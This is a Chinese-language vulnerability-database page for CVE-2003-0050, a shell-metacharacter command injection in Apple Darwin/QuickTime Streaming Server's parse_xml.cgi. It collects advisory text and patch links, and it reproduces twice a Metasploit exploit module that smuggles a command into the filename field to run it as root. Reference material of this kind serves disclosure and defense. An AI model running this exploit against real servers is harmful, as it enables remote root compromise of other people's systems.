CVE-2003-0050
CVSS7.5
发布时间 :2003-03-07 00:00:00
修订时间 :2016-10-17 22:28:47
NMCOEPS    

[原文]parse_xml.cgi in Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to execute arbitrary code via shell metacharacters.


[CNNVD]Apple Quicktime/Darwin流服务器parse_xml.cgi远程命令执行漏洞(CNNVD-200303-039)

        
        Apple Darwin和QuickTime流管理服务器是基于WEB的服务,允许管理员管理Darwin和QuickTime流服务器,默认情况下,这些服务以root用户权限监听1220/TCP端口。
        Darwin/QuickTime流服务器不充分过滤用户提交的输入,远程攻击者可以利用这个漏洞以流服务器进程权限在系统上执行任意命令。
        Darwin流管理服务器依靠parse_xml.cgi应用程序来验证和与用户交互,此CGI由PERL编写,直接传递没有进行充分处理的输入给open()函数,当管道'|'字符插入到输入的时候可导致open()函数执行嵌入的命令,参数的输入可通过GET请求提交给CGI。新版本的Darwin流管理服务器提供了部分过滤,但是插入NULL字符在命令最后一个字符和管道之间,可绕过检查,以流服务器进程权限在系统上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apple:quicktime_streaming_server:4.1.1Apple Quicktime Streaming Server 4.1.1
cpe:/a:apple:darwin_streaming_server:4.1.2Apple Darwin Streaming Server 4.1.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0050
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0050
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-039
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/archives/security-announce/2003/Feb/25/applesa20030225macosx102.txt
(UNKNOWN)  CONFIRM  http://lists.apple.com/archives/security-announce/2003/Feb/25/applesa20030225macosx102.txt
http://marc.info/?l=bugtraq&m=104618904330226&w=2
(UNKNOWN)  BUGTRAQ  20030224 QuickTime/Darwin Streaming Administration Server Multiple vulnerabilities
http://www.iss.net/security_center/static/11401.php
(VENDOR_ADVISORY)  XF  quicktime-darwin-command-execution(11401)
http://www.securityfocus.com/bid/6954
(UNKNOWN)  BID  6954

- 漏洞信息

Apple Quicktime/Darwin流服务器parse_xml.cgi远程命令执行漏洞
高危 输入验证
2003-03-07 00:00:00 2005-05-13 00:00:00
远程  
        
        Apple Darwin和QuickTime流管理服务器是基于WEB的服务,允许管理员管理Darwin和QuickTime流服务器,默认情况下,这些服务以root用户权限监听1220/TCP端口。
        Darwin/QuickTime流服务器不充分过滤用户提交的输入,远程攻击者可以利用这个漏洞以流服务器进程权限在系统上执行任意命令。
        Darwin流管理服务器依靠parse_xml.cgi应用程序来验证和与用户交互,此CGI由PERL编写,直接传递没有进行充分处理的输入给open()函数,当管道'|'字符插入到输入的时候可导致open()函数执行嵌入的命令,参数的输入可通过GET请求提交给CGI。新版本的Darwin流管理服务器提供了部分过滤,但是插入NULL字符在命令最后一个字符和管道之间,可绕过检查,以流服务器进程权限在系统上执行任意命令。
        

- 公告与补丁

        厂商补丁:
        Apple
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Apple Quicktime Streaming Server 4.1.1:
        Apple Upgrade MacOSXServerUpdate10.2.4.dmg
        
        http://docs.info.apple.com/article.html?artnum=70171#English

        Apple Darwin Streaming Server 4.1.2:
        Apple Upgrade MacOSXServerUpdate10.2.4.dmg
        
        http://docs.info.apple.com/article.html?artnum=70171#English

- 漏洞信息 (16891)

QuickTime Streaming Server parse_xml.cgi Remote Execution (EDBID:16891)
cgi webapps
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2003'
		))

		register_options(
			[
				Opt::RPORT(1220)
			], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# If the upload worked, the server tries to redirect us to some info
		# about the file we just saved
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end

		

- 漏洞信息 (F84525)

QuickTime Streaming Server parse_xml.cgi Remote Execution (PacketStormID:F84525)
2009-12-31 00:00:00
H D Moore  metasploit.com
exploit,arbitrary,cgi,root
CVE-2003-0050
[点击下载]

The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.

##
# $Id: qtss_parse_xml_exec.rb 7776 2009-12-09 15:13:35Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7776 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0
			))

		register_options([
			Opt::RPORT(1220)
		], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# If the upload worked, the server tries to redirect us to some info
		# about the file we just saved
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end

    

- 漏洞信息

10562
Apple Streaming Servers parse_xml.cgi Shell Metacharacter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Apple Streaming Servers contain a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered when the parse_xml.cgi module of the administration server fails to validate user input, which can contain an escape sequence followed by arbitrary commands. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-02-24 Unknow
2003-02-24 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple QuickTime/Darwin Streaming Server Command Execution Vulnerability
Input Validation Error 6954
Yes No
2003-02-24 12:00:00 2009-07-11 08:06:00
The discovery of this vulnerability has been credited to Dave G. <daveg@atstake.com>.

- 受影响的程序版本

Apple Quicktime Streaming Server 4.1.1
Apple Darwin Streaming Server 4.1.2

- 漏洞讨论

A command execution vulnerability has been discovered in the Darwin/QuickTime Streaming Servers. The vulnerability exists due to insufficient sanitization performed on some user-supplied input.

An attacker can exploit this vulnerability by submitting a specially crafted string to the parse_xml.cgi application that include malicious shell commands. These commands, when received by the Streaming Administration Servers, will be executed and may be used to compromise a vulnerable system.

- 漏洞利用

There is no exploit code required.

- 解决方案

Fixes are available:


Apple Quicktime Streaming Server 4.1.1

Apple Darwin Streaming Server 4.1.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站